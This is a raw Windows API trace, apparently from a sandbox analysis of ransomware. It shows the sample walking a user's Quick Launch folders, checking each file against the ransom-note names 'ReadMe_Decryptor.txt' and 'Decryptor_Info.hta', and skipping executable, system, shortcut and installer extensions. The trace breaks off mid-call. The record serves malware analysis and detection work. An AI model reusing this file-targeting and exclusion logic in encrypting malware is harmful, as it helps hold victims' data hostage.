hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x54b77470, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b77470, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.566] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.566] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.566] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xbda554a0, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0xbda554a0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0081.566] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0081.566] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0081.566] lstrlenW (lpString="Quick Launch") returned 12 [0081.566] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="Quick Launch" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0081.566] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0081.566] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 87 [0081.566] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0081.567] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.567] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xbda554a0, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0xbda554a0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.569] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.569] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.570] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4eb35ad0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0081.570] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0081.570] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0081.570] lstrcmpiW (lpString1="desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.570] lstrcmpiW (lpString1="desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0081.570] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0081.570] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0081.570] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0081.570] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0081.570] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0081.570] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0081.570] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df47e00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df47e00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a683760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x8e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0081.570] lstrcmpW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0081.570] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0081.570] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.570] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Decryptor_Info.hta") returned 1 [0081.570] PathFindExtensionW (pszPath="Google Chrome.lnk") returned=".lnk" [0081.570] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0081.570] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0081.571] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0081.571] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eb0f970, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb0f970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x4eb0f970, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x5a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Launch Internet Explorer Browser.lnk", cAlternateFileName="LAUNCH~1.LNK")) returned 1 [0081.571] lstrcmpW (lpString1="Launch Internet Explorer Browser.lnk", lpString2=".") returned 1 [0081.571] lstrcmpW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="..") returned 1 [0081.571] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.571] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="Decryptor_Info.hta") returned 1 [0081.571] PathFindExtensionW (pszPath="Launch Internet Explorer Browser.lnk") returned=".lnk" [0081.571] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0081.571] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0081.571] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0081.571] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0081.571] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2=".") returned 1 [0081.571] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="..") returned 1 [0081.571] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0081.571] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Decryptor_Info.hta") returned 1 [0081.571] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0081.571] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0081.571] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0081.572] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0081.572] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0081.572] lstrcmpW (lpString1="User Pinned", lpString2=".") returned 1 [0081.572] lstrcmpW (lpString1="User Pinned", lpString2="..") returned 1 [0081.572] lstrlenW (lpString="User Pinned") returned 11 [0081.572] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="User Pinned" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0081.572] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" [0081.572] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 99 [0081.572] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a960 [0081.572] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.572] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.574] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.574] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.574] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0081.574] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0081.574] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0081.574] lstrlenW (lpString="ImplicitAppShortcuts") returned 20 [0081.574] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="ImplicitAppShortcuts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0081.574] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" [0081.574] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 120 [0081.574] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0081.575] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.575] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.576] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.576] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.576] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.577] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0081.577] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb65d71b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb65d71b0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0081.577] lstrcmpW (lpString1="TaskBar", lpString2=".") returned 1 [0081.577] lstrcmpW (lpString1="TaskBar", lpString2="..") returned 1 [0081.577] lstrlenW (lpString="TaskBar") returned 7 [0081.577] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="TaskBar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0081.577] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" [0081.577] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 107 [0081.577] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0081.709] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.709] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb65d71b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb65d71b0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.711] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.711] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.711] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dc4b320, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0081.711] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0081.711] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0081.711] lstrcmpiW (lpString1="desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.711] lstrcmpiW (lpString1="desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0081.712] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0081.712] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0081.712] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0081.712] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0081.712] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0081.712] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0081.712] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e02c640, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7e02c640, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df47e00, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0081.712] lstrcmpW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0081.712] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0081.712] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.712] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Decryptor_Info.hta") returned 1 [0081.712] PathFindExtensionW (pszPath="Google Chrome.lnk") returned=".lnk" [0081.712] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0081.712] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0081.712] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0081.712] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc251c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc251c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (2).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0081.712] lstrcmpW (lpString1="Internet Explorer (2).lnk", lpString2=".") returned 1 [0081.712] lstrcmpW (lpString1="Internet Explorer (2).lnk", lpString2="..") returned 1 [0081.712] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.712] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="Decryptor_Info.hta") returned 1 [0081.713] PathFindExtensionW (pszPath="Internet Explorer (2).lnk") returned=".lnk" [0081.713] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0081.713] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0081.713] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0081.713] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0081.713] lstrcmpW (lpString1="Internet Explorer.lnk", lpString2=".") returned 1 [0081.713] lstrcmpW (lpString1="Internet Explorer.lnk", lpString2="..") returned 1 [0081.713] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.713] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Decryptor_Info.hta") returned 1 [0081.713] PathFindExtensionW (pszPath="Internet Explorer.lnk") returned=".lnk" [0081.713] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0081.713] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0081.713] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0081.713] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0de7e00, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb65d71b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb65d71b0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x491, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0081.713] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2=".") returned 1 [0081.713] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2="..") returned 1 [0081.713] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.713] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Decryptor_Info.hta") returned 1 [0081.713] PathFindExtensionW (pszPath="Mozilla Firefox.lnk") returned=".lnk" [0081.713] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0081.714] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0081.714] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0081.714] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc4b320, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc4b320, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer (2).lnk", cAlternateFileName="WINDOW~3.LNK")) returned 1 [0081.714] lstrcmpW (lpString1="Windows Explorer (2).lnk", lpString2=".") returned 1 [0081.714] lstrcmpW (lpString1="Windows Explorer (2).lnk", lpString2="..") returned 1 [0081.714] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0081.714] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="Decryptor_Info.hta") returned 1 [0081.714] PathFindExtensionW (pszPath="Windows Explorer (2).lnk") returned=".lnk" [0081.714] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0081.714] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0081.714] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0081.714] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0081.714] lstrcmpW (lpString1="Windows Explorer.lnk", lpString2=".") returned 1 [0081.714] lstrcmpW (lpString1="Windows Explorer.lnk", lpString2="..") returned 1 [0081.714] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0081.714] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Decryptor_Info.hta") returned 1 [0081.714] PathFindExtensionW (pszPath="Windows Explorer.lnk") returned=".lnk" [0081.714] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0081.714] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0081.714] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0081.715] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: 